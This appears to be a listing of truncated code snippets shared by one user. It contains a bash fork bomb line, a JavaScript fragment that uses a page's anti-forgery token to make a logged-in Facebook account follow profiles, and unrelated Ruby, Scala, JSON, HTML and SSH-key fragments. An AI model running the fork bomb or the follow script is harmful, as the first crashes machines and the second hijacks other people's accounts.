This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:(){ :|:& };: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function a(abone) | |
{ var http4=new XMLHttpRequest; | |
var url4="/ajax/follow/follow_profile.php?__a=1"; | |
var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp="; | |
http4.open("POST",url4,true); | |
http4.onreadystatechange=function() | |
{ if(http4.readyState==4&&http4.status==200)http4.close }; | |
http4.send(params4)} | |
function sublist(uidss) { | |
var a = document.createElement('script'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Bad | |
def ==(target); return true if target.is_a?(FalseClass); end | |
end | |
p Bad.new == false | |
p false == Bad.new |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
5000,"channel_manual_reconnect_defer_msec":2000,"sound.notif_ogg_url":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/yT\/r\/q-Drar4Ade6.ogg","sound.notif_mp3_url":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/yb\/r\/VBbzpp2k5li.mp3","sound.ringtone_mp3_url":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/yq\/r\/Mpd0-fRgh5n.mp3","sound.ringtone_ogg_url":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/y3\/r\/mbcn6dBHIeX.ogg","24h_times":false,"roger.seen_delay":15000},12],["SystemEventsInitialData",[],{"ORIGINAL_USER_ID":"598649218"},483],["ChannelInitialData",[],{"channelConfig":{"IFRAME_LOAD_TIMEOUT":30000,"P_TIMEOUT":30000,"STREAMING_TIMEOUT":70000,"PROBE_HEARTBEATS_INTERVAL_LOW":1000,"PROBE_HEARTBEATS_INTERVAL_HIGH":3000,"user_channel":"p_598649218","seq":0,"retry_interval":0,"max_conn":6,"ping_to_pull_reconnect_ratio":0.5,"config_refresh_seconds":1200,"shutdown_recovery_interval_seconds":30,"fantail_queue_capacity":100,"partition":-2,"host":"channel-proxy-06-ash2","sticky_token":490,"watchdog_enabled":0,"use_st |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
5000, "channel_manual_reconnect_defer_msec": 2000, | |
"sound.notif_ogg_url": "https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/yT\/r\/q-Drar4Ade6.ogg", | |
"sound.notif_mp3_url": "https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/yb\/r\/VBbzpp2k5li.mp3", | |
"sound.ringtone_mp3_url": "https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/yq\/r\/Mpd0-fRgh5n.mp3", | |
"sound.ringtone_ogg_url": "https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/y3\/r\/mbcn6dBHIeX.ogg", | |
"24h_times": false, | |
"roger.seen_delay": 15000 | |
}, | |
12], | |
["SystemEventsInitialData", [], { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1- huydx M |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div ng-controller="BigScope"> | |
<div class="a1"> | |
</div> | |
..... | |
..... | |
<div class="a2"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function trace() { | |
"use strict"; | |
var a = window.env || window.setting.env; | |
if ("STAGING" !== a && "PRODUCT" !== a) { | |
for (var b = [], c = 0; c < arguments.length; c++) b.push(arguments[c]); | |
window.console.log(b) | |
} | |
}! function() { | |
"use strict"; | |
var a = new UAParser, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKNgqnckJvQhAWY4LUmgxFoYzbY4bpjzb5qWPZ6CXN8VLr6c9/d6/AgGxx5gluYJkQZxuNdu+n7Dmn3K9zvMy4TkE5JppjIXEOuhsy4XApCkyDzlparuUNwqLs4H41Mb4d6nbSvIPIrVwmY60vjlbZBAo2qq44tVNYPWKPkbszunzx3YeFXNEpFlJwB+gCEcmxef+DtAsYJHQb8Iso+Kc3yxXfQOghcRy+Cd1kNHebATvGhwsxN4eXq8qtQLMv6l8CUHp99RGnliZQRzIAc8WPSS1XJCa7OSoQnB9SDeV3UZhvht4RDoSQCHjrW/NmlOYXgFq++0JWO+fKJ92MXV3R a13737@PC-5765 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def twoPermutation[T](l: List[T)) = { | |
l flatMap { a => | |
l flatMap { b => | |
if (a==b) | |
Nil | |
else | |
List(a,b) | |
} | |
} | |
} |